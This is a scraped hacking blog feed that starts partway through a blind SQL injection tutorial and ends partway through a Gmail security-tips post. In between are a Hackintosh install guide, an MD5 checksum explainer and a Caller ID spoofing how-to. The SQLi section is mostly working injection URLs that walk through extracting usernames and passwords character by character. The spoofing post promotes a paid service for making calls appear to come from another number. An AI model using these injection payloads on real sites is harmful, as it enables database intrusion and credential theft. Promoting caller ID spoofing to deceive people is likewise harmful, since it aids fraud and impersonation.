/><br />now the real test<br /><br />http://www.site.com/news.php?id=5 and 1=2 <--- this is false<br /><br />so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.<br /><br />1) Get the MySQL version<br /><br />to get the version in blind attack we use substring<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4<br /><br />this should return TRUE if the version of MySQL is 4.<br /><br />replace 4 with 5, and if query return TRUE then the version is 5.<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5<br /><br />2) Test if subselect works<br /><br />when select don't work then we use subselect<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and (select 1)=1<br /><br />if page loads normally then subselects work.<br /><br />then we gonna see if we have access to mysql.user<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1<br /><br />if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.<br /><br />3). Check table and column names<br /><br />This is part when guessing is the best friend :)<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)<br /><br />then if the page loads normally without content missing, the table users exits.<br />if you get FALSE (some article missing), just change table name until you guess the right one :)<br /><br />let's say that we have found that table name is users, now what we need is column name.<br /><br />the same as table name, we start guessing. Like i said before try the common names for columns.<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1<br /><br />if the page loads normally we know that column name is password (if we get false then try common names or just guess)<br /><br />here we merge 1 with the column password, then substring returns the first character (,1,1)<br /><br /><br />4). Pull data from database<br /><br />we found table users i columns username password so we gonna pull characters from that.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80<br /><br />ok this here pulls the first character from first user in table users.<br /><br />substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value<br /><br />and then compare it with simbol greater then > .<br /><br />so if the ascii char greater then 80, the page loads normally. (TRUE)<br /><br />we keep trying until we get false.<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95<br /><br />we get TRUE, keep incrementing<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98<br /><br />TRUE again, higher<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99<br /><br />FALSE!!!<br /><br />so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.<br /><br />then let's check the second character.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99<br /><br />Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99<br /><br />TRUE, the page loads normally, higher.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107<br /><br />FALSE, lower number.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104<br /><br />TRUE, higher.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105<br /><br />FALSE!!!<br /><br />we know that the second character is char(105) and that is 'i'. We have 'ci' so far<br /><br />so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).<br /><br />There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,<br /><br />cause that makes you better SQL INJECTOR :D<br /><br /><br /><br />Hope you learned something from this paper.<br /><br /><br />Have FUN! (:<br /><br />or u can post ur comment .....to id<br /><br />hackeramit4u@gmail.com<br /><br /></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-41244783733364999842011-01-29T02:00:00.000-08:002011-06-27T20:13:52.752-07:00Install Mac OS X on any Intel-based PC<div dir="ltr" style="text-align: left;" trbidi="on"><h3 class="post-title entry-title"><a href="http://tonymacx86.blogspot.com/2010/04/iboot-multibeast-install-mac-os-x-on.html"></a> </h3>Any OSx86 installation guide can seem daunting at first glance, especially when trying to remember cryptic terminal commands and sorting through volumes of misinformation on the web. This guide requires no coding, terminal work, or Mac experience of any kind. You will not need access to a Mac. In fact, it's easier and faster for me to install Snow Leopard with fully working components on my system than it is to install Windows 7. And more fun.<br /><br />The <b>iBoot + MultiBeast</b> method is designed and tested for any desktop or laptop running the latest line of Intel processors, the Core i3/i5/i7s. I have had reports of success with older machines as well including CoreDuo, Core2Duo, and even Pentium 4. However, AMD processors are not supported.<br /><b><br />YOU WILL NEED</b><br /><ul><li>A computer running an <b>Intel Processor</b></li><li>A blank <b>CD</b> </li><li>A <a href="http://store.apple.com/us/product/MAC_OS_X_SNGL"><b>Mac OS X Snow Leopard Retail DVD</b></a></li><li>To leave any fear of your computer at the door.</li><li>Patience and humility- it may not work out perfectly the first time- but with enough tenacity and grit, you'll reach the promised land. It's easy to get frustrated, but don't give up! There are a community of users with similar hardware in the <b><a href="http://www.tonymacx86.com/">tonymacx86 Forum</a></b> to provide support if you get stuck.</li></ul><b>BEFORE YOU BEGIN</b><br /><ul><li>If you have greater than 4gb of RAM, remove the extra RAM for a <b>maximum of 4gb</b>. You can put back any extra RAM in after the installation process.</li><li>Use only <b>1 graphics card</b> in the <b>1st PCIe slot</b> with <b>1 monitor</b> plugged in.</li><li><b>Remove any hard drives </b>besides the blank drive being used for OS X.</li><li><b>Remove any </b><b>USB peripherals</b> besides keyboard and mouse.</li><li><b>Remove any PCI cards</b> besides graphics- they may not be Mac compatible.</li><li>If using a Gigabyte 1156 board, use the <b>blue Intel SATA ports</b>- not the white Gigabyte SATA ports.</li><li>It's best to use an <b>empty hard drive</b>- you will have to partition and format the drive. </li><li><b>Always back</b><b> up</b> any of your important data.</li></ul><b>STEP 1: BIOS SETTINGS</b><br />You will need to set your BIOS to <b>ACHI</b> mode and your Boot Priority to boot from <b>CD-ROM first</b>. This is the most important step, and one many people overlook. Make sure your bios settings match these. It's not difficult- the only thing I did on my Gigabyte board besides setting Boot Priority to CD/DVD first was set Optimized Defaults, change SATA to AHCI mode, and set HPET to 64-bit mode.<br /><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil2UZpSQCnPy5aHTVrp05l_AOpa0yITMt9AtexPtGnxhTo3JuWkior9IsRcOUN8-4mGAdNsMEwkMsiqZdf406fWdG4UrHTnCfpN-iEaPtr90cn2OXIJ5KMYNRlsCf02ZPe3B701Y0p5Vo/s1600/Bios+0.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil2UZpSQCnPy5aHTVrp05l_AOpa0yITMt9AtexPtGnxhTo3JuWkior9IsRcOUN8-4mGAdNsMEwkMsiqZdf406fWdG4UrHTnCfpN-iEaPtr90cn2OXIJ5KMYNRlsCf02ZPe3B701Y0p5Vo/s320/Bios+0.JPG" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA6V5CR3lHZ8BFB7Vvdu7jpuDvmV6gFDYrgJ7N6Z0ozNw5f3DPmmd90alQyrRUnxS2Zm6dBS2E__DO8YIXYQ3gV0fSWf3mgDHnklC0OtDPCLay3o-GZkAWcw05Xd4_xUJTV2eu0bpB1lk/s1600/Bios+2.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA6V5CR3lHZ8BFB7Vvdu7jpuDvmV6gFDYrgJ7N6Z0ozNw5f3DPmmd90alQyrRUnxS2Zm6dBS2E__DO8YIXYQ3gV0fSWf3mgDHnklC0OtDPCLay3o-GZkAWcw05Xd4_xUJTV2eu0bpB1lk/s320/Bios+2.JPG" /></a></div><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq9PxM_nc2aGpBYpA2KX7HG_XS9D7N2hPKcWNUqDH_rjg6YRibbMsHoor52yKIRck874r3IW68xAmGPu3MF8nbk5fsCQe0UB0jctGzV39JJi_lzZ2ChyFg8U7TkUtyS67oSIzVImhx7HY/s1600/Bios+3.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq9PxM_nc2aGpBYpA2KX7HG_XS9D7N2hPKcWNUqDH_rjg6YRibbMsHoor52yKIRck874r3IW68xAmGPu3MF8nbk5fsCQe0UB0jctGzV39JJi_lzZ2ChyFg8U7TkUtyS67oSIzVImhx7HY/s320/Bios+3.JPG" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicnkkC5d6bBqW9ksFDptBZbg683wTQQ-cHZMJYyGJhtoRBFgbCHhmaIIuwpjXPMJGhoeRuKpEJFoLHhBH6mRLF7H-k0F0bDtYbNAkKLzVC73UhBywI6qIW8N2FGsTG56k2r_0rlGZFzS0/s1600/Bios+4.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicnkkC5d6bBqW9ksFDptBZbg683wTQQ-cHZMJYyGJhtoRBFgbCHhmaIIuwpjXPMJGhoeRuKpEJFoLHhBH6mRLF7H-k0F0bDtYbNAkKLzVC73UhBywI6qIW8N2FGsTG56k2r_0rlGZFzS0/s320/Bios+4.JPG" /></a></div><b><br />STEP 2: INSTALL MAC OS X </b><br />In order to boot the Mac OS X Retail DVD, you'll need to download and burn <b><a href="http://www.tonymacx86.com/Public/iBoot.zip">iBoot</a></b>. For desktops and laptops using unsupported Intel CPUs and graphics, a legacy version of iBoot can be downloaded <a href="http://www.tonymacx86.com/Public/iBoot-Legacy.zip">here</a>.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.tonymacx86.com/Public/iBoot.zip"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwdFx9CxC-aViES505kLw0i4yIM_8TNiqvUxcKBKThrmTKC7qPX5aHKa00UJTPpKEziSr7QJfp6njQ_HCE7pazJXk_bCa83aqlCoEx3jJSMbL2GaOCJ3XgapulvYxt6Hx9Jn0jCWwIRpE/s1600/iBoot2LogoBig.jpg" /></a></div><ol><li>Download <b><a href="http://www.tonymacx86.com/Public/iBoot.zip">iBoot</a> </b></li><li><b>Burn</b> the image to <b>CD</b> </li><li>Place <b>iBoot</b> in <b>CD/DVD drive</b></li><li><b>Restart</b> computer</li><li>At <b>Chameleon</b> prompt, eject <b>iBoot</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6FQHdxjHbUPGoolMtOp23mixNwXYSwCxBTdv0ERubr-Bp1Tk7tJtactA9qCRE0dhITnIIJaduyLovn_c4hPpEHfdoAXxh_jRL493aZuhyphenhypheniie2DXP0YFmx0Ma1XKL5KrLub5UQGk-RIpA/s1600/iBoot.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6FQHdxjHbUPGoolMtOp23mixNwXYSwCxBTdv0ERubr-Bp1Tk7tJtactA9qCRE0dhITnIIJaduyLovn_c4hPpEHfdoAXxh_jRL493aZuhyphenhypheniie2DXP0YFmx0Ma1XKL5KrLub5UQGk-RIpA/s320/iBoot.jpg" /></a></div></li><li>Insert your <b><a href="http://store.apple.com/us/product/MAC_OS_X_SNGL">Mac OS X Snow Leopard Retail DVD</a><span id="goog_1604117997"></span><span id="goog_1604117998"></span></b> and press <b>F5</b></li><li>When you see the screen below, press <b>enter</b> to begin the boot process</li><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDBEMaQT3-jqwT3g41mGIy9MhagdX6rjveit9wdHxGA4hGAxH4Q1qlPQ9TJyKABR9dkT4_9jEIbPiPD3mJV5_O4cwcL7SICHZ3QJ84mkx35kXGe7ZUbPd2_nw5hTH_Y3I2Xex0SHlKsUk/s1600/Install+DVD.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDBEMaQT3-jqwT3g41mGIy9MhagdX6rjveit9wdHxGA4hGAxH4Q1qlPQ9TJyKABR9dkT4_9jEIbPiPD3mJV5_O4cwcL7SICHZ3QJ84mkx35kXGe7ZUbPd2_nw5hTH_Y3I2Xex0SHlKsUk/s320/Install+DVD.jpg" /></a><b> </b></div><b> </b><li>When you get to the installation screen, open <b>Utilities/Disk Utility. </b><b>NOTE: If you can't get to the installation screen, retry the process, but type -x at the screen above. This will enter Mac OS X Safe Mode, which will allow you to proceed.</b></li><li><b>Partition</b> your hard drive to <b>GUID Partition Table</b></li><li><b>Format</b> your hard drive to <b>Mac OS Extended (Journaled). </b><b>NOTE: Chameleon can only boot from a disk or partition of 1 TB or less. Partition larger drives.</b></li><li>For the purposes of this guide, name it <b>Snow Leopard</b>. You can rename it later.</li><li>Close <b>Disk Utility</b></li><li>When the installer asks you where to install, choose <b>Snow Leopard</b></li><li>Choose <b>Customize</b>‚ and uncheck additional options. This will hasten the install process. You can always install this stuff later.</li><li>Restart computer.</li><li>Place <b>iBoot</b> back in drive.</li><li>When you get to the <b>Chameleon</b> boot selection screen, choose your new <b>Snow Leopard</b> installation.</li><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh-OvoHXRMfrbwYn3N4QtaDsEjrINMktAbFrEVM2f8xjssH7trNBulugj6l54-0A4MThyphenhyphenprJsWWBTb_GqI84V4QBLJRaHBJYK1_d8TO-JyQ3UFjWZ8bCCqs12vhRdwkFiYkzmnHxpYiOk/s1600/iBoot+SL.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh-OvoHXRMfrbwYn3N4QtaDsEjrINMktAbFrEVM2f8xjssH7trNBulugj6l54-0A4MThyphenhyphenprJsWWBTb_GqI84V4QBLJRaHBJYK1_d8TO-JyQ3UFjWZ8bCCqs12vhRdwkFiYkzmnHxpYiOk/s320/iBoot+SL.jpg" /></a><b> </b></div><li>View the super-cool <b><a href="http://www.youtube.com/watch?v=FPTp-YInbJ0"><b>Mac OS X Snow Leopard Welcome Video</b></a></b>, and set up your computer! </li></ol><br /><b>STEP 3: UPDATE TO 10.6.6</b><br />Upon the release of 10.6.2 and the 27" Intel Core i5 and i7 iMacs, Mac OS X Snow Leopard officially supports the Core i5 750 and Core i7 860. The 10.6.6 Update will install a Vanilla Kernel, as well as a host of security and stability fixes. Details are available on Apple's website.<br /><ol><li><b>Open Finder</b> and navigate to your <b>Snow Leopard</b> drive.</li><li>Right-click and delete <b>Mac OS X Install Folder.</b> This folder is an unnecessary remnant of the installation process, and serves no purpose.</li><li>Download the <b><a href="http://support.apple.com/kb/dl1349">Mac OS X 10.6.6 Combo Update</a> </b></li><li>Download <b><a href="http://www.tonymacx86.com/Public/MultiBeast.zip">MultiBeast</a> </b></li><li>Open <b>MultiBeast</b>- don't run it yet, just leave it open. Set up windows as shown.</li><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjee5XJXS5id9rE8XvfajxLvSc8Hee2ptntKGI0CApZdVYDBSneuHtthpWPGpK-x_Mvmxw4pFiZxf45J_aJrl2nL3BaooCTJ3ztACEJM1BQgkOkD1NBC0GXqw6oT6OkG8E76opUEvFsr_w/s1600/2+Windows.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjee5XJXS5id9rE8XvfajxLvSc8Hee2ptntKGI0CApZdVYDBSneuHtthpWPGpK-x_Mvmxw4pFiZxf45J_aJrl2nL3BaooCTJ3ztACEJM1BQgkOkD1NBC0GXqw6oT6OkG8E76opUEvFsr_w/s320/2+Windows.png" /></a></div><li>Mount <b>MacOSXUpdCombo10.6.6.dmg</b></li><li>Install <b>MacOSXUpdCombo10.6.6.pkg</b></li><li>Upon completion, the installer will ask you to reboot. <b>DO NOT REBOOT</b>.</li><li>Switch to the already open <b>MultiBeast</b>. If it closes, just re-open it.</li></ol><b>STEP 4: MULTIBEAST</b><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.tonymacx86.com/Public/MultiBeast.zip"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOdS6cGLe6oWBbcyP8FCVIFUS3mhCbCkTwd8qu-KsunZUJALdsRl54cFeqc_31-VNB8zmjLb62_oznxR8QQtZe6JtRm6RtsbvWOvjG0j1PC7R32WASk5P8KVeVXvF15DKpQ2HAAgxLTR8/s320/MultiBeastlogo.png" /></a></div><div style="text-align: center;"><a href="http://www.blogger.com/goog_221219759"><b> </b></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-iE8ndUw1uFrX8EesF9XbKrD61KRCKRNcNxLlL1UppBOWN4tB_YD0oPm903kCT48rXj4jMmmLRikispDQX8z3gv7o4Ndu30ihGcJISC9xY2EpwMUfUvUcbgoRX66dEff-uLJep9HME5A-/s1600/30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-iE8ndUw1uFrX8EesF9XbKrD61KRCKRNcNxLlL1UppBOWN4tB_YD0oPm903kCT48rXj4jMmmLRikispDQX8z3gv7o4Ndu30ihGcJISC9xY2EpwMUfUvUcbgoRX66dEff-uLJep9HME5A-/s400/30.png" width="400" /></a></div><b>MultiBeast</b> is an all-in-one post-installation tool designed to enable boot from hard drive, and install support for Audio, Network, and Graphics. It contains two different complete post-installation solutions: EasyBeast and UserDSDT. In addition it includes System Utilities to rebuild caches and repair permissions and a collection of drivers, boot loaders, boot time config files and handy software.<br /><br />Choose <b>one</b> of the following options directly following a fresh installation and update: <br /><br /><b>EasyBeast</b> is a DSDT-free solution for any Core/Core2/Core i system. It installs all of the essentials to allow your system to boot from the hard drive. Audio, Graphics and Network will have to be enabled separately. <b> </b><br /><br /><b>UserDSDT</b> is a bare-minimum solution for those who have their own pre-edited DSDT. Place your DSDT.aml on the desktop before install. Audio, Graphics and Network will have to be enabled separately. <i><b>HINT:</b> Check the <b><a href="http://www.tonymacx86.com/dsdt">DSDT Database</a></b> for a pre-edited DSDT. </i><br /><ol><li>Run <b>MultiBeast</b>.</li><li>If you have a <b>custom DSDT</b> that's been edited, place the file on your desktop and choose <b>UserDSDT</b>. </li><li>All others select <b>EasyBeast </b></li><li>Select <b>System Utilities</b>.<b> </b></li><li>Optionally, you may install further drivers via <b>Advanced Options</b> to enable ethernet, sound, graphics, etc... Be sure to read the documentation provided about each installation option. <b>NOTE:</b> <b>EasyBeast</b>, and <b>UserDSDT</b> install <b>Chameleon RC4</b> by default, so you'll not need to check that option. </li><div style="text-align: center;"><span style="font-size: medium;"><a href="http://tonymacx86.blogspot.com/2010/06/multibeast-20.html"><b>MultiBeast Demo Videos</b></a></span><span style="font-size: medium;"><b> </b></span> </div><li>Install to <b>Snow Leopard</b>- it should take about 4 minutes to run scripts.</li><li>Eject <b> iBoot</b>.</li><li>Reboot- from your new <b>Snow Leopard</b> installation drive.</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2MvCuZe06fBwUznYQKtv9Bj8PiOUb3wE_tR8idQFmiG9zo43b4sEQBc2hEile37hrmvu361Xey2ABnfNlNak5qDOP1CFH953I8xXcYVkyQJ7C0QH3l26DxjlHzsQB2DkkQ9Y3j5HKlDU/s1600/SL+Boot.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2MvCuZe06fBwUznYQKtv9Bj8PiOUb3wE_tR8idQFmiG9zo43b4sEQBc2hEile37hrmvu361Xey2ABnfNlNak5qDOP1CFH953I8xXcYVkyQJ7C0QH3l26DxjlHzsQB2DkkQ9Y3j5HKlDU/s320/SL+Boot.jpg" /></a></div><br />Congratulations! You're done!!<br /><br />Your PC is now fully operational, while running the latest version of <b>Mac OS X Snow Leopard</b>! And you have a nice Boot CD to get into your system in case things go awry. Boot your system from iBoot if you have issues. You may run MultiBeast as often as you like.<br /><br />If you can't boot, try typing -x at the Chameleon prompt to enter safe mode, or just boot with iBoot. When you get to the desktop, you can make all of the changes you need to. The best way to start fresh is delete whatever you're trying to get rid of- including the whole /Extra folder, as most kexts are installed there. Then you can re-run MultiBeast. As long as you rebuild caches and repair permissions after you're done, you can do just about anything you want to /Extra/Extensions and /System/Library/Extensions. Anything can be tweaked and enabled upon subsequent uses of MultiBeast.<br /><br />If you've had success using iBoot + MultiBeast, consider a <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=HVHVTLBJFDDUQ">contribution</a> to help keep the sites going. We're constantly updating and tweaking our tools to help you.<br /><br />Thanks in advance! <br /><br /><b>-hackeramit4u & MacMan</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWPCcQHrlycEMPdyqFgPR-ZqgE7CmK1ZIfMslHo6IgYBX0DuUk6dqOK0xtG5J5FtWsOBDyQOfrjXhgLE4KQ9FecoJfn6m7AnSAVr54nEk_hwVwY4BPqdhDrygmdo6mzHNrpYEI57B85hsO/s1600/10.6.6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWPCcQHrlycEMPdyqFgPR-ZqgE7CmK1ZIfMslHo6IgYBX0DuUk6dqOK0xtG5J5FtWsOBDyQOfrjXhgLE4KQ9FecoJfn6m7AnSAVr54nEk_hwVwY4BPqdhDrygmdo6mzHNrpYEI57B85hsO/s320/10.6.6.png" width="281" /></a></div><b><br /></b><br /><b>PS: </b>For our most current workarounds and solutions for<b> </b>issues such as USB and audio, check </div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-65703355418448627702010-12-21T05:38:00.000-08:002011-06-27T20:13:52.753-07:00MD5 Hash & How to Use it ?<div class="clearfloat" id="stats"><span class="left"><br /></span><span class="right"><a href="http://www.gohacking.com/2010/01/what-is-md5-hash-and-how-to-use-it.html#respond"></a></span></div>In this post I will explain you about one of my favorite and interesting <a href="http://en.wikipedia.org/wiki/Cryptography" target="_blank">cryptographic algorithm</a> called <b>MD5 </b>(<b>Message-Digest algorithm 5</b>). This algorithm is mainly used to perform file integrity checks under most circumstances. Here I will not jump into the technical aspects of this algorithm, rather will tell you about how to make use of this algorithm in your daily life. Before I tell you about how to use MD5, I would like to share one of my recent experience which made me start using MD5 algorithm.<br />Recently I made some significant changes and updates to my website and as obvious I generated a complete backup of the site on my server. I downloaded this backup onto my PC and deleted the original one on the server. But after a few days something went wrong and I wanted to restore the backup that I downloaded. When I tried to restore the backup I was shocked! The backup file that I used to restore was corrupted. That means, the backup file that I downloaded onto my PC wasn’t exactly the one that was on my server. The reason is that there occured some data loss during the download process. Yes, this data loss can happen often when a file is downloaded from the Internet. The file can be corrupted due to any of the following reasons.<br /><ul><li>Data loss during the download process, due to instability in the Internet connection/server</li><li>The file can be tampered due to virus infections or</li><li>Due to Hacker attacks</li></ul>So whenever you download any valuable data from the Internet it is completely necessary that you check the integrity of the downloaded file. That is you need to ensure that the downloaded file is exactly the same as that of the original one. In this scenario the MD5 hash can become handy. All you have to do is generate MD5 hash (or MD5 check-sum) for the intended file on your server. After you download the file onto your PC, again generate MD5 hash for the downloaded file. Compare these two hashes and if it matches then it means that the file is downloaded perfectly without any data loss.<br />A MD5 hash is nothing but a 32 digit hexadicimal number which can be something as follows<br /><div class="stb-container" id="stb-container"><div class="stb-info-caption_box stb_caption">A Sample MD5 Hash</div><div class="stb-info-body_box stb_body"><b>e4d909c290d0fb1ca068ffaddf22cbd0</b></div></div>This hash is unique for every file irrespective of it’s size and type. That means two .exe files with the same size will not have the same MD5 hash even though they are of same type and size. So MD5 hash can be used to uniquely identify a file.<br /><div></div><h3>How to use MD5 Hash to check the Integrity of Files?</h3><div></div>Suppose you have a file called <b>backup.tar</b> on your server. Before you download, you need to generate MD5 hash for this file on your server. To do so use the following command.<br /><i>For UNIX:</i><br /><div class="stb-info_box"><b>md5sum backup.tar</b></div>When you hit ENTER you’ll see something as follows<br /><div class="stb-info_box"><b>e4d909c290d0fb1ca068ffaddf22cbd0</b></div><div></div>This is the MD5 hash for the file <b>backup.tar</b>. After you download this file onto your PC, you can cross check it’s integrity by again re-generating MD5 hash for the downloaded file. If both the hash matches then it means that the file is perfect. Otherwise it means that the file is corrupt. To generate the MD5 hash for the downloaded file on your Windows PC use the following freeware tool<br /><a href="http://www.md5summer.org/download.html" target="_blank">MD5 Summer</a> (Click on the link to download)<br />I hope you like this post. For further doubts and clarifications please pass your comments. Cheers!Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-36081988396856340932010-12-21T05:34:00.000-08:002011-06-27T20:13:52.753-07:00Caller ID SpoofingCaller ID spoofing is the act of making the telephone network to display any desired (Fake) number on the recipient’s Caller ID display unit instead of the original number. The Caller ID spoofing can make a call appear to have come from any phone number that the caller wishes. <br />Have you ever wondered how to perform Caller ID spoofing? Read on to know more information on Caller ID spoofing and find out how it is performed.<br />Unlike what most people think, an incoming call may not be from the number that is displayed on the Caller ID display unit. Because of the high trust that the people have in the Caller ID system, it is possible for the caller to easily fool them and make them believe that the number displayed on the Caller ID display is real. This is all possible through Caller ID spoofing.<br /><div></div><h2>How to Spoof Caller ID?</h2><div></div>You can easily spoof any Caller ID using services like <a href="http://www.gohacking.com/recom_products/SpoofCard.php" rel="nofollow" target="_blank">SpoofCard</a>. In order to use the spoofcard service, you need to pay in advance and obtain a PIN (Personal Identification Number) which grants access to make a call using the Caller ID spoofing service. Once you have purchased the service, you will be given access to login to your SpoofCard account. To begin with, you need to call the number given by SpoofCard and enter the PIN. Now you will be given access to enter the number you wish to call and the number you wish to appear as the Caller ID. Once you select the options and initiate the calling process, the call is bridged and the person on the other end receives your call. The receiver would normally assume that the call was coming from a different phone number ie: the spoofed number chosen by you - thus tricking the receiver into thinking that the call was coming from a different individual or organization than the caller’s. In this way it is just a cakewalk to spoof Caller ID and trick the receiver on the other end. Thus you neither need to be a computer expert nor have any technical knowledge to perform Caller ID spoofing. For more information on SpoofCard service visit the following link.<br /><div></div><div style="font-size: 18px;"><a href="http://www.gohacking.com/recom_products/SpoofCard.php" rel="nofollow" target="_blank">SpoofCard</a></div><br /> <br /><h2>How Caller ID Spoofing works?</h2><div></div>Caller ID spoofing is done through various methods and using different technologies. The most commonly used technologies to spoof Caller ID is <a href="http://en.wikipedia.org/wiki/Voice_over_Internet_Protocol" target="_blank">VOIP</a> (Voice Over IP) and <a href="http://en.wikipedia.org/wiki/Primary_rate_interface" target="_blank">PRI</a> (Primary Rate Interface) lines.<br />Today most VOIP systems provide an option for it’s users to enter whatever number they want in the calling party field and this number is sent out when they make a call. Hence it is easily possible for any user to spoof Caller ID provided they have a VOIP system and know how to properly configure it to spoof the Caller ID. However sites like <a href="http://www.gohacking.com/recom_products/SpoofCard.php" rel="nofollow" target="_blank">SpoofCard</a> provide an easy and cheap spoofing services for those who aren’t using VOIP systems that they can configure themselves.<br />Caller ID spoofing is possible and being performed right from the days Called ID system was introduced. However most people are unaware of the fact that it is possible to spoof Caller ID and make any number to be displayed on the receiver’s end. In the past, Caller ID spoofing service was mostly used by telemarketers, collection agencies, law-enforcement officials, and private investigators but today it is available to any Internet user who wish to perform Caller ID spoofing.Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-6703792710823327032010-12-21T05:24:00.000-08:002011-06-27T20:13:52.753-07:00Best 7 Ways to Protect Your Gmail AccountEmail is the most invaluable asset of anyone’s identity on the web. You use email everyday and have all the important information stored in your inbox. All your social networking accounts, website registrations, Paypal accounts etc are connected and controlled by your email and thus it makes sense to completely secure your Gmail account and prevent unauthorized access.<br />Choosing a strong password is not enough, you should be well aware how people try to gain access to other people’s email accounts by unfair means. Here are some useful tips on securing your Gmail account and avoid getting hacked:<br /><span id="more-15881"></span><br /><h3>1. Always Check The URL before Logging in to Gmail</h3>Whenever you log in to your Gmail account, always check the URL from the browser address bar. This is because there are plenty of dirty minds who create an exact replica of the Gmail login page. The worst part – they <a class="kLink" href="http://maketecheasier.com/7-ways-to-protect-your-gmail-account-from-getting-hacked/2010/05/23#" id="KonaLink0" style="position: static; text-decoration: underline ! important;" target="undefined"><span style="color: blue; font-family: verdana,sans-serif; font-size: 13px; font-weight: 400; position: static;"><span class="kLink" style="color: blue; font-family: verdana,sans-serif; font-size: 13px; font-weight: 400; position: static;">install</span></span></a> some scripts or malicious codes behind the fake login page and host the page in their web server. When you login to Gmail from a fake login page, your username as well as password is sent to another email address or to an FTP location.<br /><img alt="Check for Fake Login Pages of Gmail" class="aligncenter size-full wp-image-15886" height="345" 